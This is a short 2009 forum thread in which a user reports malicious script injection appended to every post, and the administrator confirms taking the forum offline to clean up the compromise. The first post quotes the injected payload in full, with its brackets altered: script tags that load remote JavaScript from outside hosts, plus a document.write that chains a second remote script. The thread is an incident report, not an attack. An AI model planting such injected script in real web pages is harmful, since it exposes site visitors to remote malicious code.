Attempted script injection on forum posts

Kosh · Post by **Kosh** » Fri Jul 10, 2009 3:23 am

Hi, I'm not sure how long this has been happening, but I just noticed that all posts now have some (badly) injected scripting showing up at the end of each post, but before any signature. Here's what shows up in plain text:

Code: Select all

&#123;script src=http&#58;//cgi35.plala.or.jp/z32web30/tmp/css/css.js&#125;&#123;/script&#125;document.write&#40;"&#123;script src=http&#58;//cgi35.plala.or.jp/Mu/gwbbs/lock/eng/css.js&#125;&#123;/script&#125;"&#41;;

Sigh, angle brackets replaced with braces due to forum mis-parsing.

[edit] this post doesn't have the trailing garbage, making it appear more like the posts table has had an update run on it than an alteration in a PHP script.

Post by **Rollie** » Tue Jul 14, 2009 11:27 am

Yes, fighting the hackers takes up a ridiculous amount of my time. Hence why the forums were offline for a few days while I corrected the problem.

Kosh · Post by **Kosh** » Tue Jul 14, 2009 11:47 pm

Yea, I figured that was the reason.